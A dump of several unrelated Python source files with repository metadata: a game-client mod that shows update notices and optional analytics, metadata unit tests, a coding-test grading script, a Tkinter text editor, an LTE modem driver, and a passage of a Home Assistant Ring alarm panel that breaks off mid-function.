49389ecac90c405c9c35bd0a48479aa66ba8e1c6 | 9,086 | py | Python | mod_modPackInformer/source/mod_modPackInformer.py | stealthz67/spoter-mods-1 | 4ebd859fbb705b085ae5c4cb621edfbab476e378 | [
"WTFPL"
] | null | null | null | mod_modPackInformer/source/mod_modPackInformer.py | stealthz67/spoter-mods-1 | 4ebd859fbb705b085ae5c4cb621edfbab476e378 | [
"WTFPL"
] | null | null | null | mod_modPackInformer/source/mod_modPackInformer.py | stealthz67/spoter-mods-1 | 4ebd859fbb705b085ae5c4cb621edfbab476e378 | [
"WTFPL"
] | 1 | 2019-12-10T19:11:55.000Z | 2019-12-10T19:11:55.000Z | # -*- coding: utf-8 -*-
import json
import os
import threading
import urllib
import urllib2
import BigWorld
import ResMgr
from gui.Scaleform.daapi.view.dialogs import DIALOG_BUTTON_ID, ConfirmDialogButtons, SimpleDialogMeta
from gui.Scaleform.daapi.view.lobby.LobbyView import LobbyView
from gui import DialogsInterface, SystemMessages, makeHtmlString
from notification.NotificationListView import NotificationListView
from constants import AUTH_REALM
from helpers import getLanguageCode
from adisp import process
from gui.Scaleform.daapi.view.common.BaseTicker import BaseTicker
from helpers import dependency
from skeletons.gui.game_control import IBrowserController, IExternalLinksController
class Config(object):
def __init__(self):
self.data = {
'version' : '',
'name' : '',
'serverMain' : '',
'serverBackup' : '',
'statistic' : False,
'statisticTid' : '',
'openLinkInGameBrowser': False
}
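        # Override the defaults above with values read from the mod's XML config, if present.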
xml = ResMgr.openSection('scripts/client/gui/mods/mod_modPackInformer.xml')
if xml is not None:
self.data['version'] = '%s' % xml.readString('version', '')
self.data['name'] = '%s' % xml.readString('name', '')
self.data['serverMain'] = '%s' % xml.readString('serverMain', '')
self.data['serverBackup'] = '%s' % xml.readString('serverBackup', '')
self.data['statistic'] = xml.readBool('statistic', False)
self.data['statisticTid'] = '%s' % xml.readString('statisticTid', '')
self.data['openLinkInGameBrowser'] = xml.readBool('openLinkInGameBrowser', False)
class Updater(object):
def __init__(self):
self.show = True
self.count = 0
self.lin1 = ''
def start(self):
if not updater.show: return
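        # Query the main update server first; fall back to the backup server on failure.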
try:
f = urllib2.urlopen(config.data['serverMain'])
except StandardError:
f = None
        if f is None or f.getcode() != 200:
try:
f = urllib2.urlopen(config.data['serverBackup'])
except StandardError:
f = None
        if f is not None and f.getcode() == 200:
mod_text = ''
json_text = json.loads(f.read().decode('utf-8-sig'))
if config.data['version'] != '%s' % json_text['version']:
self.show = False
if json_text['header']:
mod_text += '%s' % json_text['header'].format(**json_text)
if json_text['image']:
try:
image = 'img://gui/html/%s' % json_text['imageName']
path = os.path.realpath(os.path.join('./res/gui/html', '%s' % json_text['imageName']))
if not os.path.exists(path):
urllib.urlretrieve('%s' % json_text['imageLink'], path)
except StandardError:
image = ''
path = ''
if image and path and os.path.exists(path):
mod_text += '<br/><img src=\"%s\" width=\"%s\" height=\"%s\">' % (image, json_text['imageWidth'], json_text['imageHeight'])
if json_text['message']:
mod_text += '<br/>%s' % json_text['message'].format(**json_text)
self.lin1 = '%s' % json_text['link']
DialogsInterface.showDialog(SimpleDialogMeta(json_text['windowName'], mod_text, ConfirmDialogButtons(json_text['buttonNameOpen'], json_text['buttonNameClose']), None), self.click)
link = makeHtmlString('html_templates:lobby/system_messages', 'link', {
'text' : '%s' % json_text['messageLinkName'],
'linkType': '%s' % self.lin1
})
p__msg = '%s<br><br>' % json_text['header'].format(**json_text)
p__msg += '<font color="#E2D2A2" size="15"><b>%s</b></font>' % link
SystemMessages.pushMessage(p__msg, SystemMessages.SM_TYPE.GameGreeting)
def click(self, isConfirmed):
if isConfirmed and self.lin1:
if self.lin1.lower().startswith('http:') or self.lin1.lower().startswith('https:'):
if config.data['openLinkInGameBrowser']:
browser.open(self.lin1)
else:
BigWorld.wg_openWebBrowser(self.lin1)
def openLink(self, action):
if self.lin1 is None or self.lin1 == '': return
if self.lin1 in action:
self.click(True)
class Statistics(object):
def __init__(self):
self.analytics_started = False
self.thread_analytics = None
self.user = None
self.old_user = None
def analytics_start(self):
if not self.analytics_started:
lang = str(getLanguageCode()).upper()
param = urllib.urlencode({
'v' : 1, # Version.
'tid': config.data['statisticTid'],
'cid': self.user, # Anonymous Client ID.
't' : 'screenview', # Screenview hit type.
'an' : 'modPackInformer "%s"' % config.data['name'], # App name.
'av' : 'modPackInformer "%s" %s' % (config.data['name'], config.data['version']),
'cd' : 'Cluster: [%s], lang: [%s]' % (AUTH_REALM, lang), # Screen name / content description.
'ul' : '%s' % lang,
'sc' : 'start'
})
urllib2.urlopen(url='http://www.google-analytics.com/collect?', data=param).read()
self.analytics_started = True
self.old_user = BigWorld.player().databaseID
def start(self):
player = BigWorld.player()
if self.user and self.user != player.databaseID:
self.old_user = player.databaseID
self.thread_analytics = threading.Thread(target=self.end, name='Thread')
self.thread_analytics.start()
self.user = player.databaseID
self.thread_analytics = threading.Thread(target=self.analytics_start, name='Thread')
self.thread_analytics.start()
def end(self):
if self.analytics_started:
lang = str(getLanguageCode()).upper()
param = urllib.urlencode({
'v' : 1, # Version.
'tid': config.data['statisticTid'],
'cid': self.user, # Anonymous Client ID.
't' : 'screenview', # Screenview hit type.
'an' : 'modPackInformer "%s"' % config.data['name'], # App name.
'av' : 'modPackInformer "%s" %s' % (config.data['name'], config.data['version']),
'cd' : 'Cluster: [%s], lang: [%s]' % (AUTH_REALM, lang), # Screen name / content description.
'ul' : '%s' % lang,
'sc' : 'end'
})
urllib2.urlopen(url='http://www.google-analytics.com/collect?', data=param).read()
self.analytics_started = False
class p__Browser(BaseTicker):
externalBrowser = dependency.descriptor(IExternalLinksController)
internalBrowser = dependency.descriptor(IBrowserController)
def __init__(self):
super(p__Browser, self).__init__()
self.__browserID = 'modPackInformer'
return
def _dispose(self):
self.__browserID = 'modPackInformer'
super(p__Browser, self)._dispose()
return
def open(self, link, internal=True):
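        # Use the in-game browser when requested and available; otherwise open the link externally.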
if internal:
if self.internalBrowser is not None:
self.__showInternalBrowser(link)
else:
self.__showExternalBrowser(link)
else:
self.__showExternalBrowser(link)
return
@process
def __showInternalBrowser(self, link):
self.__browserID = yield self.internalBrowser.load(url=link, browserID=self.__browserID)
def __showExternalBrowser(self, link):
if self.externalBrowser is not None:
self.externalBrowser.open(link)
def hookedGetLabels(self):
return [{
'id' : DIALOG_BUTTON_ID.SUBMIT,
'label' : self._submit,
'focused': True
}, {
'id' : DIALOG_BUTTON_ID.CLOSE,
'label' : self._close,
'focused': False
}]
def hookedLobbyPopulate(self):
hookLobbyPopulate(self)
start = threading.Thread(target=updater.start, name='updater.start')
start.start()
if config.data['statistic']:
stat.start()
def hookedOnClickAction(*args):
updater.openLink(args[3])
hookOnClickAction(*args)
def init():
print '[LOAD_MOD]: [modPackInformer, by spoter]'
def fini():
stat.end()
config = Config()
browser = p__Browser()
updater = Updater()
stat = Statistics()
ConfirmDialogButtons.getLabels = hookedGetLabels
hookLobbyPopulate = LobbyView._populate
LobbyView._populate = hookedLobbyPopulate
hookOnClickAction = NotificationListView.onClickAction
NotificationListView.onClickAction = hookedOnClickAction
| 38.5 | 195 | 0.575171 | 907 | 9,086 | 5.636163 | 0.242558 | 0.032864 | 0.014085 | 0.011737 | 0.281299 | 0.235133 | 0.190141 | 0.178795 | 0.178795 | 0.178795 | 0 | 0.005153 | 0.295179 | 9,086 | 235 | 196 | 38.66383 | 0.792942 | 0.023443 | 0 | 0.266332 | 0 | 0 | 0.133521 | 0.021783 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.085427 | null | null | 0.005025 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4945214eb5cf61ec5b89774833abf449ace18614 | 7,845 | py | Python | test/unittest/datafinder_test/persistence/metadata/value_mapping/custom_format_test.py | schlauch/DataFinder | 958fda4f3064f9f6b2034da396a20ac9d9abd52f | [
"BSD-3-Clause"
] | 9 | 2016-05-25T06:12:52.000Z | 2021-04-30T07:22:48.000Z | test/unittest/datafinder_test/persistence/metadata/value_mapping/custom_format_test.py | schlauch/DataFinder | 958fda4f3064f9f6b2034da396a20ac9d9abd52f | [
"BSD-3-Clause"
] | 6 | 2016-03-29T13:38:18.000Z | 2017-01-18T15:57:42.000Z | test/unittest/datafinder_test/persistence/metadata/value_mapping/custom_format_test.py | schlauch/DataFinder | 958fda4f3064f9f6b2034da396a20ac9d9abd52f | [
"BSD-3-Clause"
] | 7 | 2016-06-15T12:01:22.000Z | 2022-03-05T08:50:25.000Z | # $Filename$
# $Authors$
# Last Changed: $Date$ $Committer$ $Revision-Id$
#
# Copyright (c) 2003-2011, German Aerospace Center (DLR)
#
# All rights reserved.
#Redistribution and use in source and binary forms, with or without
#modification, are permitted provided that the following conditions are
#
#met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the
# distribution.
#
# * Neither the name of the German Aerospace Center nor the names of
# its contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
#THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
#LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
#A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
#OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
#SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
#LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
#DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
#THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
#(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
#OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
Implements test cases for the custom meta data persistence format.
"""
from datetime import datetime
import decimal
import sys
import unicodedata
import unittest
from datafinder.persistence.error import PersistenceError
from datafinder.persistence.metadata.value_mapping import\
MetadataValue, getPersistenceRepresentation
__version__ = "$Revision-Id$"
_AE = unicodedata.lookup("LATIN SMALL LETTER A WITH DIAERESIS")
class MetadataValueTestCase(unittest.TestCase):
def testInvalidPersistenceValue(self):
self.assertRaises(PersistenceError, MetadataValue, None)
def testComparison(self):
self.assertEquals(MetadataValue("a"), MetadataValue("a"))
self.assertEquals(hash(MetadataValue("a")),
hash(MetadataValue("a")))
self.assertNotEquals(MetadataValue("a"), MetadataValue("b"))
self.assertNotEquals(hash(MetadataValue("a")),
hash(MetadataValue("b")))
self.assertNotEquals(MetadataValue("a"), None)
self.assertNotEquals(hash(MetadataValue("a")), hash(None))
def testRepresentation(self):
self.assertEquals(str(MetadataValue("a")), "'a'")
def testBoolValue(self):
self.assertTrue(MetadataValue("1").value)
self.assertFalse(MetadataValue("0").value)
def testStringValue(self):
self.assertEquals(MetadataValue(u"test").value, u"test")
self.assertEquals(MetadataValue("test").value, "test")
# Special escaped sequences
self.assertEquals(MetadataValue("\\____EMPTY____LIST____").value,
"____EMPTY____LIST____")
self.assertEquals(MetadataValue("\\;").value, ";")
def testNumericValue(self):
self.assertEquals(MetadataValue(u"4.5").value, decimal.Decimal("4.5"))
self.assertEquals(MetadataValue(u"5").value, decimal.Decimal("5"))
def testDatetimeValue(self):
# From time stamp
metdataValue = MetadataValue("0", expectedType=datetime)
self.assertEquals(metdataValue.value, datetime(1970, 1, 1, 1, 0))
# From RFC 822.
persistedValue = u"Wed, 02 Oct 2002 13:00:00 GMT"
metdataValue = MetadataValue(persistedValue)
self.assertEquals(metdataValue.value, datetime(2002, 10, 2, 15, 0))
# From Iso8601.
persistedValue = u"2006-10-16T08:19:39Z"
metdataValue = MetadataValue(persistedValue)
self.assertEquals(metdataValue.value, datetime(2006, 10, 16, 10, 19, 39))
def testListValue(self):
# Success
self.assertEquals(MetadataValue("a;b;1").value,
["a", "b", decimal.Decimal(1)])
# Special cases
persistedValue = u"____EMPTY____LIST____"
metdataValue = MetadataValue(persistedValue)
self.assertEquals(metdataValue.value, list())
self.assertEquals(MetadataValue(";").value, ";")
self.assertEquals(MetadataValue("a\\;b;c").value, ["a;b", "c"])
def testDictValues(self):
metdataValue = MetadataValue("{}")
self.assertEquals(metdataValue.value, dict())
def testGuessRepresentation(self):
# Success
self.assertEquals(MetadataValue("").guessRepresentation(), [None])
self.assertEquals(MetadataValue("1").guessRepresentation(),
[True, decimal.Decimal("1"),
datetime(1970, 1, 1, 1, 0, 1), u"1"])
class GetPersistenceRepresentationTestCase(unittest.TestCase):
def testBoolValue(self):
self.assertEquals(getPersistenceRepresentation(True), "1")
self.assertEquals(getPersistenceRepresentation(False), "0")
def testNoneValue(self):
self.assertEquals(getPersistenceRepresentation(None), "")
self.assertRaises(PersistenceError, getPersistenceRepresentation, tuple())
def testStringValue(self):
self.assertEquals(getPersistenceRepresentation(u"test"), u"test")
self.assertEquals(getPersistenceRepresentation("test"), u"test")
# Special escaped sequences
self.assertEquals(getPersistenceRepresentation(";"), "\\;")
self.assertEquals(getPersistenceRepresentation("____EMPTY____LIST____"),
"\\____EMPTY____LIST____")
        # Invalid raw string
        orignalFunction = sys.getdefaultencoding
        sys.getdefaultencoding = lambda: None  # Mock encoding determination
        try:
            self.assertRaises(
                PersistenceError, getPersistenceRepresentation, _AE.encode("Latin-1"))
        finally:
            sys.getdefaultencoding = orignalFunction
    def testNumericValue(self):
        # Decimals
        persistedValue = decimal.Decimal("4.5")
        self.assertEquals(getPersistenceRepresentation(persistedValue), u"4.5")
        persistedValue = decimal.Decimal("5")
        self.assertEquals(getPersistenceRepresentation(persistedValue), u"5")

        # Raw integer
        self.assertEquals(getPersistenceRepresentation(5), u"5")

        # Raw float
        self.assertEquals(getPersistenceRepresentation(4.5), u"4.5")

    def testDatetimeValue(self):
        persistedValue = datetime(2006, 10, 16, 10, 19, 39)
        self.assertEquals(getPersistenceRepresentation(persistedValue),
                          u"2006-10-16T08:19:39Z")

    def testListValue(self):
        persistedValue = [decimal.Decimal("2006"), decimal.Decimal("10"),
                          decimal.Decimal("16"), decimal.Decimal("10")]
        self.assertEquals(getPersistenceRepresentation(persistedValue),
                          u"2006;10;16;10;")

        persistedValue = list()
        self.assertEquals(getPersistenceRepresentation(persistedValue),
                          u"____EMPTY____LIST____")

    def testDictValue(self):
        self.assertEquals(getPersistenceRepresentation(dict()), u"{}")
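
# --- Illustrative addition (not part of the original module): a standard
# entry point so the suite can also be run directly with `python <file>.py`,
# assuming the datafinder package is importable.
if __name__ == "__main__":
    unittest.main()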
| 42.405405 | 88 | 0.653792 | 757 | 7,845 | 6.67107 | 0.321004 | 0.107723 | 0.130693 | 0.032673 | 0.285743 | 0.186535 | 0.113861 | 0.058614 | 0.026931 | 0.026931 | 0 | 0.026835 | 0.244742 | 7,845 | 184 | 89 | 42.63587 | 0.825485 | 0.236966 | 0 | 0.156863 | 0 | 0 | 0.067003 | 0.022624 | 0 | 0 | 0 | 0 | 0.421569 | 1 | 0.166667 | false | 0 | 0.068627 | 0 | 0.254902 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
49477b4b9fb8484c659b6dfe9a98235bbdb4b218 | 3,629 | py | Python | programmers/kakao2022/kakao2022/grader.py | jiyolla/StudyForCodingTestWithDongbinNa | c070829dd9c7b02b139e56511832c4a3b9f5982f | [
"MIT"
] | null | null | null | programmers/kakao2022/kakao2022/grader.py | jiyolla/StudyForCodingTestWithDongbinNa | c070829dd9c7b02b139e56511832c4a3b9f5982f | [
"MIT"
] | null | null | null | programmers/kakao2022/kakao2022/grader.py | jiyolla/StudyForCodingTestWithDongbinNa | c070829dd9c7b02b139e56511832c4a3b9f5982f | [
"MIT"
] | null | null | null | import random
from .api import put_change_grade


# grades[id] = grade for user #{id}.
# grades[0] is not used. Since user id starts from 1.
def change_grade_randomshuffle(grades):
    changed_users_id = set(range(len(grades)))
    changed_users_id.remove(0)

    grades = list(range(len(grades)))
    random.shuffle(grades)

    commands = []
    for changed_user_id in changed_users_id:
        commands.append({'id': changed_user_id, 'grade': grades[changed_user_id]})
    put_change_grade(commands)


def change_grade_simplelinear(grades, game_results):
    MAX_TAKEN = 40
    changed_users_id = set()
    for game_result in game_results:
        changed_users_id.add(game_result['win'])
        changed_users_id.add(game_result['lose'])
        grades[game_result['win']] += MAX_TAKEN - game_result['taken']
        grades[game_result['lose']] -= MAX_TAKEN - game_result['taken']

    commands = []
    for changed_user_id in changed_users_id:
        commands.append({'id': changed_user_id, 'grade': grades[changed_user_id]})
    put_change_grade(commands)


def change_grade_discountedlinear(grades, game_results):
    BASE_SCORE = 100
    MIN_TAKEN = 3
    MAX_TAKEN = 40
    changed_users_id = set()
    for game_result in game_results:
        changed_users_id.add(game_result['win'])
        changed_users_id.add(game_result['lose'])
        grades[game_result['win']] += BASE_SCORE * (2 - 1.6*(game_result['taken'] - MIN_TAKEN)/(MAX_TAKEN - MIN_TAKEN))
        grades[game_result['lose']] -= BASE_SCORE * (2 - 1.6*(game_result['taken'] - MIN_TAKEN)/(MAX_TAKEN - MIN_TAKEN))

    commands = []
    for changed_user_id in changed_users_id:
        commands.append({'id': changed_user_id, 'grade': grades[changed_user_id]})
    put_change_grade(commands)


def change_grade_simplequadratic(grades, game_results):
    MAX_TAKEN = 40
    changed_users_id = set()
    for game_result in game_results:
        changed_users_id.add(game_result['win'])
        changed_users_id.add(game_result['lose'])
        grades[game_result['win']] += (MAX_TAKEN - game_result['taken'])**2
        grades[game_result['lose']] -= (MAX_TAKEN - game_result['taken'])**2

    commands = []
    for changed_user_id in changed_users_id:
        commands.append({'id': changed_user_id, 'grade': grades[changed_user_id]})
    put_change_grade(commands)


def change_grade_preventabusediscountedlinear(grades, game_results, suspicion_marks):
    BASE_SCORE = 4000
    MIN_TAKEN = 3
    MAX_TAKEN = 40
    changed_users_id = set()
    for game_result in game_results:
        winner = game_result['win']
        loser = game_result['lose']
        game_time = game_result['taken']
        changed_users_id.add(winner)
        changed_users_id.add(loser)

        if game_time < 11:
            expected_game_time = 40 - abs(grades[winner] - grades[loser])/99000*35
            tolerance = 5 + 5
            if game_time < expected_game_time - tolerance:
                suspicion_marks[loser] += 1
                if suspicion_marks[loser] > 2:
                    continue

        expected_win_rate = grades[winner]/(grades[winner] + grades[loser])
        win_rate_modifier = expected_win_rate  # (expected_win_rate - 0.3)*2 + 0.2
        grades[winner] += win_rate_modifier*BASE_SCORE*(3 - 2.5*(game_time - MIN_TAKEN)/(MAX_TAKEN - MIN_TAKEN))
        grades[loser] -= win_rate_modifier*BASE_SCORE*(3 - 2.5*(game_time - MIN_TAKEN)/(MAX_TAKEN - MIN_TAKEN))

    commands = []
    for changed_user_id in changed_users_id:
        commands.append({'id': changed_user_id, 'grade': grades[changed_user_id]})
    put_change_grade(commands)
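
# --- Illustrative usage sketch (hypothetical data; put_change_grade posts to
# the real grading API, so this is left commented out):
#
# grades = [0, 1000, 1000]                          # index 0 unused, ids start at 1
# results = [{'win': 1, 'lose': 2, 'taken': 10}]    # a quick 10-second win
# change_grade_simplelinear(grades, results)        # user 1 gains 30, user 2 loses 30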
| 36.656566 | 120 | 0.673188 | 497 | 3,629 | 4.56338 | 0.136821 | 0.110229 | 0.117284 | 0.059965 | 0.681658 | 0.661817 | 0.660935 | 0.655644 | 0.655644 | 0.619929 | 0 | 0.018776 | 0.207495 | 3,629 | 98 | 121 | 37.030612 | 0.769819 | 0.032791 | 0 | 0.533333 | 0 | 0 | 0.033952 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.026667 | 0 | 0.093333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
494cefc1f9462c0538e6c405bcec6cc75cbab494 | 1,136 | py | Python | misc/texteditor.py | disc0nnctd/myPythonCodesDC | 378b0cf749124ef8b7f8d70f6f298faa6c9f73de | [
"MIT"
] | 1 | 2017-04-30T18:20:32.000Z | 2017-04-30T18:20:32.000Z | misc/texteditor.py | disc0nnctd/myPythonCodesDC | 378b0cf749124ef8b7f8d70f6f298faa6c9f73de | [
"MIT"
] | 1 | 2017-04-30T10:09:45.000Z | 2017-04-30T12:39:19.000Z | misc/texteditor.py | disc0nnctd/myPythonCodesDC | 378b0cf749124ef8b7f8d70f6f298faa6c9f73de | [
"MIT"
] | 1 | 2017-04-30T09:54:08.000Z | 2017-04-30T09:54:08.000Z | """A simple text editor made in Python 2.7."""
from os import path, chdir
workingdir = path.join(path.dirname(__file__), 'texts')
chdir(workingdir)

from Tkinter import Tk, Text, Button
import tkFileDialog

root = Tk("Text Editor")
text = Text(root)
text.grid()
def saveas():
    """Save file."""
    try:
        t = text.get("1.0", "end-1c")  # "1.0" means read from beginning
                                       # "end-1c" means delete last character
        savelocation = tkFileDialog.asksaveasfilename()
        file1 = open(savelocation, "w")
        file1.write(t)
        file1.close()  # was `file1.close` without parentheses, so the file was never closed
    except IOError:
        pass
def openfile():
    """Open file."""
    try:
        location = tkFileDialog.askopenfilename()
        file1 = open(location, "r")
        fileContents = file1.read()
        text.delete(1.0, "end")
        text.insert(1.0, fileContents)
    except IOError:
        pass


button = Button(root, text="Open", command=openfile)
button.grid()
button = Button(root, text="Save As", command=saveas)
button.grid()

root.mainloop()

workingdir = path.join(path.dirname(__file__))
chdir(workingdir)
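
# --- Illustrative note (an assumption about the Tkinter API, not from the
# original script): Text indices are "line.column" strings, so "1.0" is the
# very first character and "end-1c" stops one character before the trailing
# newline Tk always appends, e.g.:
#
# text.insert("1.0", "hello")
# text.get("1.0", "end-1c")    # -> "hello"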
| 25.244444 | 73 | 0.611796 | 136 | 1,136 | 5.051471 | 0.441176 | 0.011645 | 0.052402 | 0.064047 | 0.09607 | 0.09607 | 0 | 0 | 0 | 0 | 0 | 0.020047 | 0.253521 | 1,136 | 44 | 74 | 25.818182 | 0.790094 | 0.116197 | 0 | 0.30303 | 0 | 0 | 0.043478 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.060606 | false | 0.060606 | 0.090909 | 0 | 0.151515 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
4953b0d0a882cec4862d24ffe94ed3594bc14dec | 1,816 | py | Python | insighioNode/lib/networking/modem/modem_sequans.py | insighio/insighioNode | 396b0858ffb265ac66075e8b9d90713ffae7ffb8 | [
"MIT"
] | 5 | 2021-06-11T09:03:12.000Z | 2021-12-22T09:04:57.000Z | insighioNode/lib/networking/modem/modem_sequans.py | insighio/insighioNode | 396b0858ffb265ac66075e8b9d90713ffae7ffb8 | [
"MIT"
] | 1 | 2021-06-11T14:15:05.000Z | 2021-06-11T14:15:33.000Z | insighioNode/lib/networking/modem/modem_sequans.py | insighio/insighioNode | 396b0858ffb265ac66075e8b9d90713ffae7ffb8 | [
"MIT"
] | null | null | null | from modem_base import Modem
from network import LTE
import logging
class ModemSequans(Modem):

    def __init__(self):
        self.lte = LTE()

    def power_on(self):
        self.lte.init()

    def power_off(self):
        self.lte.deinit(dettach=True, reset=True)

    def init(self):
        return True

    def connect(self, timeoutms=30000):
        (status, lines) = self.send_at_cmd('AT+CGDATA="PPP",1', 30000, "CONNECT")
        if not status:
            return False

        import network
        self.ppp = network.PPP(self.uart)
        self.ppp.active(True)
        self.ppp.connect()

        start_timestamp = utime.ticks_ms()
        timeout_timestamp = start_timestamp + timeoutms
        while utime.ticks_ms() < timeout_timestamp:
            self.connected = self.is_connected()
            if self.connected:
                break
            utime.sleep_ms(100)
        return self.connected

    def is_connected(self):
        return self.lte.isconnected()

    def disconnect(self):
        if self.ppp:
            self.ppp.active(False)
        self.connected = False
        (status, _) = self.send_at_cmd("AT+CGACT=0,1")
        return status
    # to be overridden by children
    def set_gps_state(self, poweron=True):
        pass

    # to be overridden by children
    def is_gps_on(self):
        return False

    def get_gps_position(self, timeoutms=300000):
        return None
    def send_at_cmd(self, command, timeoutms=30000, success_condition="OK"):
        response = ""
        status = False
        logging.debug(command)
        response = self.lte.send_at_cmd(command)
        if response:
            # check for "OK" while the response is still a string; the original
            # called .find() on the list returned by splitlines(), which fails
            status = (response.find("OK") != -1)
            response = response.strip().splitlines()
            logging.debug(response)
        return (status, response)
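
# --- Illustrative usage sketch (assumes MicroPython firmware where this
# driver and its Modem base class are available; names match the class above):
#
# modem = ModemSequans()
# modem.power_on()
# if modem.connect(timeoutms=60000):
#     ok, lines = modem.send_at_cmd("AT+CSQ")    # query signal quality
# modem.power_off()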
| 24.540541 | 81 | 0.601872 | 219 | 1,816 | 4.844749 | 0.342466 | 0.032988 | 0.03393 | 0.024505 | 0.130066 | 0.04901 | 0 | 0 | 0 | 0 | 0 | 0.021961 | 0.297907 | 1,816 | 73 | 82 | 24.876712 | 0.810196 | 0.030286 | 0 | 0.038462 | 0 | 0 | 0.022753 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.211538 | false | 0.019231 | 0.076923 | 0.076923 | 0.461538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
496001f2e20c60b98e9d4d0701aee95ac8df87b1 | 3,692 | py | Python | alarm_control_panel.py | rs1932/homeassistant-ring_alarm_component | b65b8ee1bc7e7408c3bc1adb6fd4e3f4ebf330d6 | [
"Apache-2.0"
] | 4 | 2019-09-07T23:15:54.000Z | 2020-04-20T22:47:37.000Z | alarm_control_panel.py | rs1932/homeassistant-ring_alarm_component | b65b8ee1bc7e7408c3bc1adb6fd4e3f4ebf330d6 | [
"Apache-2.0"
] | 3 | 2019-09-10T00:03:24.000Z | 2020-10-02T13:26:08.000Z | alarm_control_panel.py | rs1932/homeassistant-ring_alarm_component | b65b8ee1bc7e7408c3bc1adb6fd4e3f4ebf330d6 | [
"Apache-2.0"
] | 3 | 2019-11-19T11:03:01.000Z | 2021-05-12T20:11:16.000Z | import logging
import pandas as pd

from homeassistant.components.alarm_control_panel import (
    AlarmControlPanel
)
from homeassistant.core import callback
from homeassistant.util import convert

from .ringalarmdevice import RingAlarmDevice
from .constants import *

from homeassistant.const import (
    STATE_ALARM_ARMED_AWAY,
    STATE_ALARM_ARMED_HOME,
    STATE_ALARM_DISARMED
)

_LOGGER = logging.getLogger(__name__)


def setup_platform(hass, config, add_devices, device):
    # for index, device in devices.iterrows():
    add_devices([RingAlarmControlPanel(device)], True)


class RingAlarmControlPanel(RingAlarmDevice, AlarmControlPanel):

    def __init__(self, ringalarm_device):
        super().__init__(ringalarm_device)

        try:
            if ringalarm_device[DEVICE_ALARM_MODE] == "none":
                self._state = STATE_ALARM_DISARMED
        except:
            pass

        try:
            if ringalarm_device[DEVICE_ALARM_MODE] == "some":
                self._state = STATE_ALARM_ARMED_HOME
        except:
            pass

        try:
            if ringalarm_device[DEVICE_ALARM_MODE] == "all":
                self._state = STATE_ALARM_ARMED_AWAY
        except:
            pass

        try:
            self._tamper_status = ringalarm_device[DEVICE_TAMPER_STATUS]
        except:
            pass

    def update(self):
        pass

    def alarm_disarm(self, code=None):
        """Send disarm command."""
        try:
            self.controller.ring_api.send_command_ring(self.ringalarm_device[DEVICE_ZID],
                                                       self.ringalarm_device[DEVICE_SOURCE],
                                                       'security-panel.switch-mode',
                                                       data={'mode': 'none', "bypass": None})
        except:
            pass

    def alarm_arm_home(self, code=None):
        """Send arm home command."""
        try:
            self.controller.ring_api.send_command_ring(self.ringalarm_device[DEVICE_ZID],
                                                       self.ringalarm_device[DEVICE_SOURCE],
                                                       'security-panel.switch-mode',
                                                       data={'mode': 'some', "bypass": None})
        except:
            pass

    def alarm_arm_away(self, code=None):
        """Send arm away command."""
        try:
            self.controller.ring_api.send_command_ring(self.ringalarm_device[DEVICE_ZID],
                                                       self.ringalarm_device[DEVICE_SOURCE],
                                                       'security-panel.switch-mode',
                                                       data={'mode': 'all', "bypass": None})
        except:
            pass

    def update_callback(self, data):
        try:
            if data[DEVICE_ALARM_MODE] == "none":
                self._state = STATE_ALARM_DISARMED
        except:
            pass

        try:
            if data[DEVICE_ALARM_MODE] == "some":
                self._state = STATE_ALARM_ARMED_HOME
        except:
            pass

        try:
            if data[DEVICE_ALARM_MODE] == "all":
